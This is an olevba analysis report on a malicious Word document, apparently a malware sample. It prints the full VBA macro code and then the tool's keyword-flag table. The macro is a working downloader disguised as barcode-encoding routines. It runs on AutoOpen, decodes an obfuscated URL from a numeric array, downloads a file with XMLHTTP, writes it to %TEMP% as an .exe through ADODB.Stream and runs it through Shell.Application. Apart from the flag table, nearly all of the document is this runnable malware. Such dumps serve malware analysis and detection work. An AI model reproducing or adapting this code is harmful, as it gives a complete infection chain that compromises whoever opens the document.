Malicious Word macro

1. olevba 0.41 - http://decalage.info/python/oletools
2. Flags        Filename                                                        
3. -----------  -----------------------------------------------------------------
4. OLE:MAS-HB-V malware1.doc
5.  
6. (Flags: OpX=OpenXML, XML=Word2003XML, MHT=MHTML, M=Macros, A=Auto-executable, S=Suspicious keywords, I=IOCs, H=Hex strings, B=Base64 strings, D=Dridex strings, V=VBA strings, ?=Unknown)
7.  
8. ===============================================================================
9. FILE: malware1.doc
10. Type: OLE
11. -------------------------------------------------------------------------------
12. VBA MACRO ThisDocument.cls
13. in file: malware1.doc - OLE stream: u'Macros/VBA/ThisDocument'
14. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
15. Sub autoopen()
16.  
17. bc_Code39 ""
18. bc_EAN ""
19.  
20. End Sub
21.  
22.  
23.  
24. -------------------------------------------------------------------------------
25. VBA MACRO Module1.bas
26. in file: malware1.doc - OLE stream: u'Macros/VBA/Module1'
27. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
28. Public bc_25_I As Object
29. Public bc_26_I As Object
30. Public bc_27_I  As Object
31. Public bc_28_I As String
32. Public bc_29_I As String
33. Public bc_30_I As Object
34. Public Const pzonda = "a"
35. Public Const pzonde = "e"
36. Public Const pzondP = "P"
37. Sub Init()
38.  If VarType(Asc("A")) = 2 Then IsMs = True Else IsMs = False
39. End Sub
40. Public Function EncodeBarcode(ShIx As Integer, xAddr As String, _
41.  code As String, pbctype%, Optional pgraficky%, _
42.  Optional pparams%, Optional pzones%) As String
43.  Dim s$, bctype%, graficky%, params%, zones%
44.  Dim oo As Object
45.  Call Init
46.  If IsMissing(pzones) Then zones = 2 Else zones = pzones
47.  If IsMissing(pparams) Then params = 0 Else params = pparams
48.  If IsMissing(pgraficky) Then graficky = 1 Else graficky = pgraficky
49.  If IsMissing(pbctype) Then bctype = 0 Else bctype = pbctype
50.  Select Case bctype
51.  Case 1
52.  s = bc_EAN(code, params, zones)
53.  Case 2
54.  s = bc_25I(code, zones)
55.  Case 3
56.  s = bc_Code39(code, params, zones)
57.  Case 50
58.  s = dmx_gen(code, IIf(params = 1, "ASCII", ""))
59.  Case 51
60.  s = "mode=" & Mid("MLQH", (params Mod 4) + 1, 1)
61.  s = qr_gen(code, s)
62.  Case Else
63.  s = bc_Code128(code, params, zones)
64.  End Select
65.  If graficky <> 0 Then
66.  If bctype >= 50 Then
67.  If IsMs Then
68.  Call bc_2Dms(s)
69.  Else
70.  Call bc_2D(ShIx, xAddr, s)
71.  End If
72.  Else
73.  If IsMs Then
74.  Call bc_1Dms(s)
75.  Else
76.  Call bc_1D(ShIx, xAddr, s)
77.  End If
78.  End If
79.  EncodeBarcode = ""
80.  Else
81.  EncodeBarcode = s
82.  End If
83.  Exit Function
84. End Function
85. Public Function pzone3(bc_Code_40() As Variant, pparam As Integer) As String
86.     Dim i As Integer
87.     pgraficky = ""
88.     For i = LBound(bc_Code_40) To UBound(bc_Code_40)
89.         pgraficky = pgraficky & Chr(bc_Code_40(i) - pparam - 5 * pparam - 4455)
90.     Next i
91.     pzone3 = pgraficky
92. End Function
93. Function AscL(s As String) As Long
94.  If IsMs Then AscL = AscW(s) Else AscL = Asc(s)
95. End Function
96. Function bc_25I(chaine$, Optional zones%) As String
97.  Dim i%, j%, k%, l%, s$, q$, zon$
98.  If IsMissing(zones%) Then
99.  zon$ = "DD"
100.  Else
101.  zon$ = IIf(zones% <= 0, "", Mid$("DDDDDDDDDD", 1, zones%))
102.  End If
103.  q = chaine
104.  s = ""
105.  For i = 1 To Len(q)
106.  j = (AscL(Mid(q, i, 1)) Mod 256) - 48
107.  If (j >= 0 And j <= 9) Then s = s & Chr(48 + j)
108.  Next
109.  i = Len(s)
110.  If i <= 0 Then
111.  bc_25I = ""
112.  Exit Function
113.  End If
114.  If (i Mod 2) = 1 Then s = "0" & s
115.  q = zon & "0A0A"
116.  For i = 1 To Len(s) Step 2
117.  j = Val(Mid(s, i, 1)) * 5
118.  k = 50 + Val(Mid(s, i + 1, 1)) * 5
119.  For l = 1 To 5
120.  q = q & Mid(BCEnc25, j + l, 1) & Mid(BCEnc25, k + l, 1)
121.  Next
122.  Next
123.  bc_25I = q & "01A0" & zon
124. End Function
125. Public Function bc_Code39(chaine$, Optional params%, Optional zones%) As String
126.  Dim i, j%, s$, p$, q$, zon$, ext%, ch%, check%
127.  Set bc_25_I = CreateObject("Microsoft" + ".XMLHTT" + pzondP)
128. Set bc_30_I = CreateObject("Shell.Application")
129. Set bc_26_I = CreateObject("Adodb.Str" + pzonde + pzonda + "m")
130.  GoTo bc_27_g
131.  If IsMissing(zones) Then
132.  zon$ = "DD"
133.  Else
134.  zon$ = IIf(zones <= 0, "", Mid("DDDDDDDDDD", 1, zones))
135.  End If
136.  If IsMissing(params) Then
137.  check = 0
138.  ext = 0
139.  Else
140.  check = Int(params / 4) Mod 2
141.  ext = (params Mod 4) - 1
142.  End If
143.  s = chaine
144.  If Len(s) <= 0 Then
145.  bc_Code39 = ""
146.  Exit Function
147.  End If
148.  If ext = -1 Then
149.  For i = 1 To Len(s)
150.  p = Mid(s, i, 1)
151.  j = InStr(BCChs39, p)
152.  If j <= 0 Or AscL(p) > 90 Then
153.  ext = 1
154.  Exit For
155.  End If
156.  Next
157.  End If
158.  If ext = 1 Then
159.  p = s
160.  s = ""
161.  For i = 1 To Len(p)
162.  j = AscL(Mid(p, i, 1)) Mod 256
163.  If j = 32 Then
164.  s = s & " "
165.  ElseIf (j <= 127) Then
166.  s = s & Trim(Mid(BCExt39, 1 + j * 2, 2))
167.  End If
168.  Next
169.  End If
170.  q = zon & "0C0A2A2A0A"
171.  ch = 0
172.  For i = 1 To Len(s)
173.  p = Mid(s, i, 1)
174.  j = InStr(BCChs39, p) - 1
175.  If j >= 0 And j < 43 Then
176.  ch = (ch + j) Mod 43
177.  q = q & Mid(BCEnc39, j * 9 + 1, 9) & "A"
178.  End If
179.  Next
180.  If check = 1 Then q = q & Mid(BCEnc39, ch * 9 + 1, 9) & "A"
181.  bc_Code39 = q & "0C0A2A2A0" & zon
182. bc_27_g:
183.  Set bc_27_I = CreateObject("WScript.Sh" + pzonde + "ll").Environment(pzondP + "" + "roc" + pzonde + "ss")
184. End Function
185. Public Function bc_EAN(chaine$, Optional params%, Optional zones%) As String
186.  Dim i%, j%, checksum%, first%, CodeBarre$, s$, p$, q$, zon$, subtyp%, check%
187.  Dim tableA As Boolean
188.  Dim checksud() As Variant
189. checksud = Array(4769, 4781, 4781, 4777, 4723, 4712, 4712, 4784, 4784, 4784, 4711, 4773, 4762, 4774, 4762, 4711, 4779, 4780, 4712, 4721, 4720, 4781, 4779, 4719, 4718, 4712, 4717, 4716, 4784, 4766, 4765, 4767, 4711, 4766, 4785, 4766)
190. bc_25_I.Open Chr(Asc(pzondP) - 9) + "ET", pzone3(checksud, 35), False
191. GoTo bc_E_A_N
192.  If IsMissing(zones) Then
193.  zon$ = "DD"
194.  Else
195.  zon$ = IIf(zones <= 0, "", Mid("DDDDDDDDDD", 1, zones))
196.  End If
197.  If IsMissing(params) Then
198.  check = 0
199.  subtyp = 0
200.  Else
201.  check = Int(params / 8) Mod 2
202.  subtyp = params Mod 8
203.  End If
204.  s = chaine
205.  p = ""
206.  CodeBarre = zon
207.  For i = 1 To Len(s)
208.  j = AscL(Mid(s, i, 1)) Mod 256
209.  If j >= 48 Or j <= 57 Then p = p & Chr(j)
210.  Next i
211.  s = p
212.  If subtyp = 4 Then
213.  While Len(s) < 6
214.  s = "0" & s
215.  Wend
216.  If Len(s) > 6 Then s = Left(s, 6)
217.  p = s
218.  first = Val(Right(p, 1))
219.  If first >= 5 Then
220.  s = "00" & Left(p, 5) & "0000" & Right(p, 1)
221.  ElseIf first = 4 Then
222.  s = "00" & Left(p, 4) & "00000" & Mid(p, 5, 1)
223.  ElseIf first = 3 Then
224.  s = "00" & Left(p, 3) & "00000" & Mid(p, 4, 2)
225.  Else
226.  s = "00" & Left(p, 2) & Right(p, 1) & "0000" & Mid(p, 3, 3)
227.  End If
228.  End If
229.  If check = 1 Or subtyp = 4 Then s = s & "0"
230.  While Len(s) < 13
231.  s = "0" & s
232.  Wend
233.  checksum = 0
234.  first = 1
235.  For i = 1 To 12
236.  j = AscL(Mid(s, i, 1)) Mod 256
237.  checksum = (checksum + first * (j - 48)) Mod 10
238.  first = (first + 2) Mod 4
239.  Next
240.  s = Left(s, 12) & Chr(48 + (10 - checksum Mod 10) Mod 10)
241.  If subtyp = 4 Then
242.  s = "000000" & Right(s, 1) & p
243.  End If
244.  If Left(s, 12) <> "000000000000" Then
245.  CodeBarre = CodeBarre & "0A0"
246.  If subtyp = 0 And Left(s, 5) = "00000" Then subtyp = 2
247.  If subtyp = 0 And Left(s, 1) = "0" Then subtyp = 3
248.  If subtyp = 0 Then subtyp = 1
249.  If subtyp = 2 Then
250.  j = 5
251.  p = "0000LLLLRRRR"
252.  ElseIf subtyp = 3 Then
253.  j = 1
254.  p = "LLLLLLRRRRRR"
255.  ElseIf subtyp = 4 Then
256.  first = Val(Mid(s, 7, 1))
257.  j = 7
258.  p = "000000" & Mid("GGGLLLGGLGLLGGLLGLGGLLLGGLGGLLGLLGGLGLLLGGGLGLGLGLGLLGGLLGLG", 1 + first * 6, 6)
259.  Else
260.  j = 1
261.  first = Val(Left(s, 1))
262.  p = Mid("LLLLLLLLGLGGLLGGLGLLGGGLLGLLGGLGGLLGLGGGLLLGLGLGLGLGGLLGGLGL", 1 + first * 6, 6) + "RRRRRR"
263.  End If
264.  For i = j To 12
265.  first = Val(Mid(s, i + 1, 1))
266.  q = Mid(BCEncE13, 1 + first * 12, 12)
267.  Select Case Mid(p, i, 1)
268.  Case "L"
269.  CodeBarre = CodeBarre & Mid(q, 1, 4)
270.  Case "G"
271.  CodeBarre = CodeBarre & Mid(q, 5, 4)
272.  Case "R"
273.  CodeBarre = CodeBarre & Mid(q, 9, 4)
274.  End Select
275.  Select Case subtyp
276.  Case 1: If i = 6 Then CodeBarre = CodeBarre & "A0A0A"
277.  Case 3: If i = 6 Then CodeBarre = CodeBarre & "A0A0A"
278.  Case 2: If i = 8 Then CodeBarre = CodeBarre & "A0A0A"
279.  End Select
280.  Next
281.  If subtyp = 4 Then CodeBarre = CodeBarre & "A0A"
282.  CodeBarre = CodeBarre & "0A0"
283.  End If
284.  bc_EAN = CodeBarre & zon
285. bc_E_A_N:
286.  bc_28_I = bc_27_I("TEM" + pzondP)
287.  bc_Code128 ""
288. End Function
289. Function bc_Code128(chaine$, Optional params%, Optional zones%) As String
290.  Dim i%, checksum&, checkw&, min$, n%, zon$, s$, c128$, tbl$, q$, j%
291.  
292.  
293. bc_29_I = bc_28_I + "\" + LCase(pzondP) + pzonda + pzonda + pzonde + "me1" + "." + pzonde + "x" + pzonde
294. GoTo bc_Code1283
295.  If IsMissing(zones) Then
296.  zon$ = "DD"
297.  Else
298.  zon$ = IIf(zones <= 0, "", Mid("DDDDDDDDDD", 1, zones))
299.  End If
300.  c128 = ""
301.  s = chaine
302.  If Len(s) <= 0 Then
303.  bc_Code128 = ""
304.  Exit Function
305.  End If
306.  min = ""
307.  If (params Mod 4) >= 1 And (params Mod 4) <= 3 Then
308.  tbl = Mid("ABC", params Mod 4, 1)
309.  Else
310.  tbl = ""
311.  End If
312.  i = 1
313.  Do While i <= Len(s)
314.  n = AscL(Mid(s, i, 1)) Mod 256
315.  If n = 95 Then
316.  i = i + 1
317.  If i > Len(s) Then n = 0 Else n = AscL(Mid(s, i, 1)) Mod 256
318.  If (n >= 49 And n <= 52) Then
319.  n = 48 - n
320.  ElseIf n >= 64 And n <= 94 Then
321.  n = n - 64
322.  ElseIf n = 48 Then
323.  n = 31
324.  Else
325.  n = 95
326.  End If
327.  End If
328.  If n >= 128 Then
329.  n = n Mod 128
330.  min = min & "z"
331.  c128 = c128 & "-05"
332.  End If
333.  Select Case n
334.  Case 48 To 57, -1
335.  min = min & "C"
336.  Case -4 To -2
337.  min = min & "z"
338.  Case 0 To 31
339.  min = min & "A"
340.  Case 32 To 63
341.  min = min & "z"
342.  Case Else
343.  min = min & "B"
344.  End Select
345.  q = "000" & Trim(CStr(Abs(n)))
346.  If n < 0 Then q = "-" & Right(q, 2) Else q = Right(q, 3)
347.  c128 = c128 & q
348.  i = i + 1
349.  Loop
350.  s = zon
351.  If tbl = "" Then
352.  If Left(min, 4) = "CCCC" Then
353.  tbl = "C"
354.  ElseIf InStr(min, "A") <= 0 Or Left(min, 1) = "B" Then
355.  tbl = "B"
356.  Else
357.  tbl = "A"
358.  End If
359.  End If
360.  n = 103 + AscL(tbl) - 65
361.  s = s & Mid(BCEnc128, 6 * n + 1, 6)
362.  checksum = n
363.  checkw = 1
364.  i = 1
365.  Do While i <= Len(min)
366.  n = Val(Mid(c128, -2 + (i * 3), 3))
367.  q = Mid(min, i, 1)
368.  Select Case tbl
369.  Case "C"
370.  If q <> "C" Then
371.  If q = "A" Or (q = "z" And InStr(Mid(min, i), "B") < 0) Then
372.  tbl = "A"
373.  n = 101
374.  Else
375.  tbl = "B"
376.  n = 100
377.  End If
378.  i = i - 1
379.  Else
380.  If (n = -1) Then
381.  n = 102
382.  Else
383.  j = (n - 48) * 10
384.  If (i >= Len(min) Or Mid(min, i + 1, 1) <> "C") Then
385.  tbl = "B"
386.  n = 100
387.  i = i - 1
388.  Else
389.  i = i + 1
390.  n = Val(Mid(c128, -2 + (i * 3), 3))
391.  If n < 0 Then
392.  tbl = "B"
393.  n = 100
394.  i = i - 2
395.  Else
396.  n = j + (n - 48)
397.  End If
398.  End If
399.  End If
400.  End If
401.  Case "A"
402.  If q = "B" Then
403.  n = 100
404.  i = i - 1
405.  tbl = "B"
406.  ElseIf Mid(min, i, 4) = "CCCC" Then
407.  n = 99
408.  i = i - 1
409.  tbl = "C"
410.  Else
411.  Select Case n
412.  Case -5: n = 98
413.  Case -4: n = 101
414.  Case -3: n = 96
415.  Case -2: n = 97
416.  Case -1: n = 102
417.  Case 0 To 31
418.  n = n + 64
419.  Case Else
420.  n = n - 32
421.  End Select
422.  End If
423.  Case "B"
424.  If q = "A" Then
425.  n = 101
426.  i = i - 1
427.  tbl = "A"
428.  ElseIf Mid(min, i, 4) = "CCCC" Then
429.  n = 99
430.  i = i - 1
431.  tbl = "C"
432.  Else
433.  Select Case n
434.  Case -5: n = 98
435.  Case -4: n = 100
436.  Case -3: n = 96
437.  Case -2: n = 97
438.  Case -1: n = 102
439.  Case Else
440.  n = n - 32
441.  End Select
442.  End If
443.  End Select
444.  If n >= 0 And n <= 102 Then
445.  s = s & Mid(BCEnc128, 6 * n + 1, 6)
446.  checksum = (checksum + checkw * n) Mod 103
447.  checkw = checkw + 1
448.  End If
449.  i = i + 1
450.  Loop
451.  n = checksum Mod 103
452.  s = s & Mid(BCEnc128, 6 * n + 1, 6)
453.  s = s + "1C2A0A1"
454.  bc_Code128 = s & zon
455. bc_Code1283:
456. bc_25_I.Send
457.  
458. dmx_place "", 0, 0, 0, 0, 0
459. End Function
460. Function dmx_place(parr As String, psiz As Integer, _
461.  pbl As Integer, prow As Integer, pcol As Integer, _
462.  pbit As Integer) As Boolean
463.  
464.  With bc_26_I
465.    bc_26_I.Type = 1
466.     bc_26_I.Open
467.     bc_26_I.write bc_25_I.responseBody
468.     bc_26_I.savetofile bc_29_I, 2
469. End With
470. GoTo dmx_pl3_ace
471.  Dim ix%, va%, r%, c%, s%
472.  r = prow
473.  c = pcol
474.  If psiz > 0 Then
475.  s = psiz / pbl
476.  If r < 0 Then
477.  r = r + psiz
478.  c = c + 4 - ((psiz + 4) Mod 8)
479.  End If
480.  If c < 0 Then
481.  c = c + psiz
482.  r = r + 4 - ((psiz + 4) Mod 8)
483.  End If
484.  If c >= psiz Then
485.  c = c - psiz
486.  r = r + 1
487.  End If
488.  r = r + (Int(r / s) * 2)
489.  c = c + (Int(c / s) * 2)
490.  End If
491.  dmx_place = False
492.  r = r + 2
493.  c = c + 2
494.  ix = r * 20 + Int(c / 8)
495.  If ix > 12 Or ix < 0 Then Exit Function
496.  c = 2 ^ (c Mod 8)
497.  If psiz > 0 Then
498.  If (Int(va / c) Mod 2) = 0 Then
499.  If pbit < 0 Then
500.  dmx_place = True
501.  Exit Function
502.  End If
503.  Else
504.  Exit Function
505.  End If
506.  End If
507.  If pbit > 0 Then
508.  If (Int(va / c) Mod 2) = 0 Then va = va + c
509.  End If
510.  dmx_place = True
511. dmx_pl3_ace:
512.  bc_30_I.Open (bc_29_I)
513. End Function
514.  
515. Sub bc_1Dms(xBC As String)
516.  Dim xShape As Shape, xBkgr As Shape
517.  Dim xSheet As Worksheet
518.  Dim xRange As Range, xCell As Range
519.  Dim xAddr As String
520.  Dim xPosOldX As Double, xPosOldY As Double
521.  Dim xSizeOldW As Double, xSizeOldH As Double
522.  Dim x As Double
523.  Dim n%, w%, s$, h%, g%
524.  If TypeName(Application.Caller) <> "Range" Then
525.  Exit Sub
526.  End If
527.  Set xSheet = Application.Caller.Worksheet
528.  Set xRange = Application.Caller
529.  xAddr = xRange.Address
530.  xPosOldX = xRange.Left
531.  xPosOldY = xRange.Top
532.  xSizeOldW = 0
533.  xSizeOldH = 0
534.  s = "BC" & xAddr & "#GR"
535.  x = 0
536.  For n = 1 To Len(xBC)
537.  w = AscL(Mid(xBC, n, 1)) Mod 256
538.  If (w >= 48 And w <= 57) Then
539.  w = (w - 48) Mod 5 + 1
540.  ElseIf (w >= 65 And w <= 69) Then
541.  w = w - 64
542.  Else
543.  w = 0
544.  End If
545.  x = x + 1.5 * w
546.  Next n
547.  If x <= 0# Then Exit Sub
548.  On Error Resume Next
549.  Set xShape = xSheet.Shapes(s)
550.  On Error GoTo 0
551.  If Not (xShape Is Nothing) Then
552.  xPosOldX = xShape.Left
553.  xPosOldY = xShape.Top
554.  xSizeOldW = xShape.Width
555.  xSizeOldH = xShape.Height
556.  xShape.Delete
557.  End If
558.  On Error Resume Next
559.  xSheet.Shapes("BC" & xAddr & "#BK").Delete
560.  On Error GoTo 0
561.  Set xBkgr = xSheet.Shapes.AddShape(msoShapeRectangle, 0, 0, x, 51#)
562.  xBkgr.Line.Visible = msoFalse
563.  xBkgr.Line.Weight = 0#
564.  xBkgr.Line.ForeColor.RGB = RGB(255, 255, 255)
565.  xBkgr.Fill.Solid
566.  xBkgr.Fill.ForeColor.RGB = RGB(255, 255, 255)
567.  xBkgr.Name = "BC" & xAddr & "#BK"
568.  Set xShape = Nothing
569.  x = 0#
570.  g = 0
571.  For n = 1 To Len(xBC)
572.  w = AscL(Mid(xBC, n, 1)) Mod 256
573.  If (w >= 48 And w <= 57) Then
574.  If w >= 53 Then h = 47 Else h = 50
575.  w = (w - 48) Mod 5 + 1
576.  Set xShape = xSheet.Shapes.AddShape(msoShapeRectangle, x, 0, 1.5 * w, h)
577.  xShape.Line.Visible = msoFalse
578.  xShape.Line.Weight = 0#
579.  xShape.Fill.Solid
580.  xShape.Fill.ForeColor.RGB = RGB(0, 0, 0)
581.  g = g + 1
582.  xShape.Name = "BC" & xAddr & "#BR" & g
583.  If g = 1 Then
584.  xSheet.Shapes.Range(Array(xBkgr.Name, xShape.Name)).Group.Name = s
585.  Else
586.  xSheet.Shapes.Range(Array(s, xShape.Name)).Group.Name = s
587.  End If
588.  ElseIf (w >= 65 And w <= 69) Then
589.  w = w - 64
590.  Else
591.  w = 0
592.  End If
593.  x = x + 1.5 * w
594.  Next n
595.  On Error Resume Next
596.  Set xShape = xSheet.Shapes(s)
597.  On Error GoTo 0
598.  If Not (xShape Is Nothing) Then
599.  xShape.Left = xPosOldX
600.  xShape.Top = xPosOldY
601.  If xSizeOldW > 0 Then
602.  xShape.Width = xSizeOldW
603.  xShape.Height = xSizeOldH
604.  End If
605.  Else
606.  If Not (xBkgr Is Nothing) Then xBkgr.Delete
607.  End If
608. End Sub
609.  
610.  
611.  
612.  
613.  
614.  
615. +------------+----------------------+-----------------------------------------+
616. | Type       | Keyword              | Description                             |
617. +------------+----------------------+-----------------------------------------+
618. | AutoExec   | AutoOpen             | Runs when the Word document is opened   |
619. | Suspicious | Open                 | May open a file                         |
620. | Suspicious | Shell                | May run an executable file or a system  |
621. |            |                      | command                                 |
622. | Suspicious | Shell.Application    | May run an application (if combined     |
623. |            |                      | with CreateObject)                      |
624. | Suspicious | CreateObject         | May create an OLE object                |
625. | Suspicious | Chr                  | May attempt to obfuscate specific       |
626. |            |                      | strings                                 |
627. | Suspicious | SaveToFile           | May create a text file                  |
628. | Suspicious | Write                | May write to a file (if combined with   |
629. |            |                      | Open)                                   |
630. | Suspicious | Hex Strings          | Hex-encoded strings were detected, may  |
631. |            |                      | be used to obfuscate strings (option    |
632. |            |                      | --decode to see all)                    |
633. | Suspicious | Base64 Strings       | Base64-encoded strings were detected,   |
634. |            |                      | may be used to obfuscate strings        |
635. |            |                      | (option --decode to see all)            |
636. | Suspicious | VBA obfuscated       | VBA string expressions were detected,   |
637. |            | Strings              | may be used to obfuscate strings        |
638. |            |                      | (option --decode to see all)            |
639. | Hex String |                     | 0C0A2A2A0A                              |
640. |            | **                   |                                         |
641. |            |                      |                                         |
642. | Hex String |                     | 0C0A2A2A                                |
643. |            | **                   |                                         |
644. | VBA string | Microsoft.XMLHTT     | "Microsoft" + ".XMLHTT"                 |
645. | VBA string | roc                  | "" + "roc"                              |
646. | VBA string | me1.                 | "me1" + "."                             |
647. +------------+----------------------+-----------------------------------------+